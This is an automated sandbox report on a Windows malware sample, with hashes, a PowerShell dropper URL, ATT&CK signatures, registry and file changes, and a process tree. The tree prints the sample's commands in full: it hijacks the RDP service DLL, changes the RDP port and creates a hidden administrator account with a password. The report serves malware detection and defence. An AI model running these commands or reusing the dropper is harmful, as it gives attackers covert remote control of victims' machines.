af7e2ecb8e84ad61c276347e0e766e21a043f2119dacb19ae538bddf5d0452f0

Analysis

max time kernel
115s
max time network
119s
platform
windows10_x64
resource
win10-en-20210920
submitted
24-09-2021 19:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5367615a3d3f95eeab592a53716ed3bb.exe
Size

5.7MB
MD5

5367615a3d3f95eeab592a53716ed3bb
SHA1

8592c6e78aa592d9f135dbe9d97cf2f524dbeaed
SHA256

af7e2ecb8e84ad61c276347e0e766e21a043f2119dacb19ae538bddf5d0452f0
SHA512

383fada6525e8ced7cc40c14d6cb6718583da6dca4f7db2654c15c0842a692d2011364da6f53690f005ed33f90606e81836eefeb8df04de655904fa5776b8790

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
10	3660	powershell.exe
12	3660	powershell.exe
13	3660	powershell.exe
14	3660	powershell.exe
16	3660	powershell.exe
18	3660	powershell.exe
20	3660	powershell.exe
22	3660	powershell.exe
24	3660	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

1400
1400

pid	process
1400
1400

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICB3.tmp	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID92.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID52.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_sduftrvg.eqj.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zm5tuu4o.kou.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID02.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID32.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3660 reg.exe
Runs net.exe

pid	process
3660	reg.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	14	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2796	powershell.exe
2796	powershell.exe
2796	powershell.exe
2196	powershell.exe
2196	powershell.exe
2196	powershell.exe
3676	powershell.exe
3676	powershell.exe
3676	powershell.exe
2916	powershell.exe
2916	powershell.exe
2916	powershell.exe
2796	powershell.exe
2796	powershell.exe
2796	powershell.exe
3660	powershell.exe
3660	powershell.exe
3660	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

624
624

pid	process
624
624

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeIncreaseQuotaPrivilege	2196	powershell.exe
Token: SeSecurityPrivilege	2196	powershell.exe
Token: SeTakeOwnershipPrivilege	2196	powershell.exe
Token: SeLoadDriverPrivilege	2196	powershell.exe
Token: SeSystemProfilePrivilege	2196	powershell.exe
Token: SeSystemtimePrivilege	2196	powershell.exe
Token: SeProfSingleProcessPrivilege	2196	powershell.exe
Token: SeIncBasePriorityPrivilege	2196	powershell.exe
Token: SeCreatePagefilePrivilege	2196	powershell.exe
Token: SeBackupPrivilege	2196	powershell.exe
Token: SeRestorePrivilege	2196	powershell.exe
Token: SeShutdownPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeSystemEnvironmentPrivilege	2196	powershell.exe
Token: SeRemoteShutdownPrivilege	2196	powershell.exe
Token: SeUndockPrivilege	2196	powershell.exe
Token: SeManageVolumePrivilege	2196	powershell.exe
Token: 33	2196	powershell.exe
Token: 34	2196	powershell.exe
Token: 35	2196	powershell.exe
Token: 36	2196	powershell.exe
Token: SeDebugPrivilege	3676	powershell.exe
Token: SeIncreaseQuotaPrivilege	3676	powershell.exe
Token: SeSecurityPrivilege	3676	powershell.exe
Token: SeTakeOwnershipPrivilege	3676	powershell.exe
Token: SeLoadDriverPrivilege	3676	powershell.exe
Token: SeSystemProfilePrivilege	3676	powershell.exe
Token: SeSystemtimePrivilege	3676	powershell.exe
Token: SeProfSingleProcessPrivilege	3676	powershell.exe
Token: SeIncBasePriorityPrivilege	3676	powershell.exe
Token: SeCreatePagefilePrivilege	3676	powershell.exe
Token: SeBackupPrivilege	3676	powershell.exe
Token: SeRestorePrivilege	3676	powershell.exe
Token: SeShutdownPrivilege	3676	powershell.exe
Token: SeDebugPrivilege	3676	powershell.exe
Token: SeSystemEnvironmentPrivilege	3676	powershell.exe
Token: SeRemoteShutdownPrivilege	3676	powershell.exe
Token: SeUndockPrivilege	3676	powershell.exe
Token: SeManageVolumePrivilege	3676	powershell.exe
Token: 33	3676	powershell.exe
Token: 34	3676	powershell.exe
Token: 35	3676	powershell.exe
Token: 36	3676	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeIncreaseQuotaPrivilege	2916	powershell.exe
Token: SeSecurityPrivilege	2916	powershell.exe
Token: SeTakeOwnershipPrivilege	2916	powershell.exe
Token: SeLoadDriverPrivilege	2916	powershell.exe
Token: SeSystemProfilePrivilege	2916	powershell.exe
Token: SeSystemtimePrivilege	2916	powershell.exe
Token: SeProfSingleProcessPrivilege	2916	powershell.exe
Token: SeIncBasePriorityPrivilege	2916	powershell.exe
Token: SeCreatePagefilePrivilege	2916	powershell.exe
Token: SeBackupPrivilege	2916	powershell.exe
Token: SeRestorePrivilege	2916	powershell.exe
Token: SeShutdownPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeSystemEnvironmentPrivilege	2916	powershell.exe
Token: SeRemoteShutdownPrivilege	2916	powershell.exe
Token: SeUndockPrivilege	2916	powershell.exe
Token: SeManageVolumePrivilege	2916	powershell.exe
Token: 33	2916	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5367615a3d3f95eeab592a53716ed3bb.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 1860 wrote to memory of 2796	1860	5367615a3d3f95eeab592a53716ed3bb.exe	powershell.exe
PID 1860 wrote to memory of 2796	1860	5367615a3d3f95eeab592a53716ed3bb.exe	powershell.exe
PID 2796 wrote to memory of 3428	2796	powershell.exe	csc.exe
PID 2796 wrote to memory of 3428	2796	powershell.exe	csc.exe
PID 3428 wrote to memory of 1268	3428	csc.exe	cvtres.exe
PID 3428 wrote to memory of 1268	3428	csc.exe	cvtres.exe
PID 2796 wrote to memory of 2196	2796	powershell.exe	powershell.exe
PID 2796 wrote to memory of 2196	2796	powershell.exe	powershell.exe
PID 2796 wrote to memory of 3676	2796	powershell.exe	powershell.exe
PID 2796 wrote to memory of 3676	2796	powershell.exe	powershell.exe
PID 2796 wrote to memory of 2916	2796	powershell.exe	powershell.exe
PID 2796 wrote to memory of 2916	2796	powershell.exe	powershell.exe
PID 2796 wrote to memory of 1008	2796	powershell.exe	reg.exe
PID 2796 wrote to memory of 1008	2796	powershell.exe	reg.exe
PID 2796 wrote to memory of 3660	2796	powershell.exe	reg.exe
PID 2796 wrote to memory of 3660	2796	powershell.exe	reg.exe
PID 2796 wrote to memory of 808	2796	powershell.exe	reg.exe
PID 2796 wrote to memory of 808	2796	powershell.exe	reg.exe
PID 2796 wrote to memory of 516	2796	powershell.exe	net.exe
PID 2796 wrote to memory of 516	2796	powershell.exe	net.exe
PID 516 wrote to memory of 3020	516	net.exe	net1.exe
PID 516 wrote to memory of 3020	516	net.exe	net1.exe
PID 2796 wrote to memory of 1140	2796	powershell.exe	cmd.exe
PID 2796 wrote to memory of 1140	2796	powershell.exe	cmd.exe
PID 1140 wrote to memory of 3676	1140	cmd.exe	cmd.exe
PID 1140 wrote to memory of 3676	1140	cmd.exe	cmd.exe
PID 3676 wrote to memory of 584	3676	cmd.exe	net.exe
PID 3676 wrote to memory of 584	3676	cmd.exe	net.exe
PID 584 wrote to memory of 2920	584	net.exe	net1.exe
PID 584 wrote to memory of 2920	584	net.exe	net1.exe
PID 2796 wrote to memory of 528	2796	powershell.exe	cmd.exe
PID 2796 wrote to memory of 528	2796	powershell.exe	cmd.exe
PID 528 wrote to memory of 1236	528	cmd.exe	cmd.exe
PID 528 wrote to memory of 1236	528	cmd.exe	cmd.exe
PID 1236 wrote to memory of 1624	1236	cmd.exe	net.exe
PID 1236 wrote to memory of 1624	1236	cmd.exe	net.exe
PID 1624 wrote to memory of 1580	1624	net.exe	net1.exe
PID 1624 wrote to memory of 1580	1624	net.exe	net1.exe
PID 648 wrote to memory of 1260	648	cmd.exe	net.exe
PID 648 wrote to memory of 1260	648	cmd.exe	net.exe
PID 1260 wrote to memory of 3428	1260	net.exe	net1.exe
PID 1260 wrote to memory of 3428	1260	net.exe	net1.exe
PID 3356 wrote to memory of 1608	3356	cmd.exe	net.exe
PID 3356 wrote to memory of 1608	3356	cmd.exe	net.exe
PID 1608 wrote to memory of 364	1608	net.exe	net1.exe
PID 1608 wrote to memory of 364	1608	net.exe	net1.exe
PID 2696 wrote to memory of 3920	2696	cmd.exe	net.exe
PID 2696 wrote to memory of 3920	2696	cmd.exe	net.exe
PID 3920 wrote to memory of 1496	3920	net.exe	net1.exe
PID 3920 wrote to memory of 1496	3920	net.exe	net1.exe
PID 1752 wrote to memory of 2912	1752	cmd.exe	net.exe
PID 1752 wrote to memory of 2912	1752	cmd.exe	net.exe
PID 2912 wrote to memory of 592	2912	net.exe	net1.exe
PID 2912 wrote to memory of 592	2912	net.exe	net1.exe
PID 856 wrote to memory of 3020	856	cmd.exe	net.exe
PID 856 wrote to memory of 3020	856	cmd.exe	net.exe
PID 3020 wrote to memory of 3104	3020	net.exe	net1.exe
PID 3020 wrote to memory of 3104	3020	net.exe	net1.exe
PID 776 wrote to memory of 3428	776	cmd.exe	net.exe
PID 776 wrote to memory of 3428	776	cmd.exe	net.exe
PID 3428 wrote to memory of 3684	3428	net.exe	net1.exe
PID 3428 wrote to memory of 3684	3428	net.exe	net1.exe
PID 3344 wrote to memory of 1572	3344	cmd.exe	WMIC.exe
PID 3344 wrote to memory of 1572	3344	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe
"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uchmv1dz\uchmv1dz.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3428
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC6A1.tmp" "c:\Users\Admin\AppData\Local\Temp\uchmv1dz\CSC5785D5D8B7D445B2AC25F685596F5E5.TMP"
      4⤵
      PID:1268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2916
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1008
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:3660
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:808
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:516
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3020
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1140
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:528
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1236
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1624
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1580
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:3212
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1756

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
1⤵
- Suspicious use of WriteProcessMemory
PID:3676
- C:\Windows\system32\net.exe
  net start rdpdr
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start rdpdr
    3⤵
    PID:2920

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:648
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:3428

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc bbBpaooa /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3356
- C:\Windows\system32\net.exe
  net.exe user wgautilacc bbBpaooa /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1608
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc bbBpaooa /add
    3⤵
    PID:364

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:1496

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1752
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
    3⤵
    PID:592

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:856
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3020
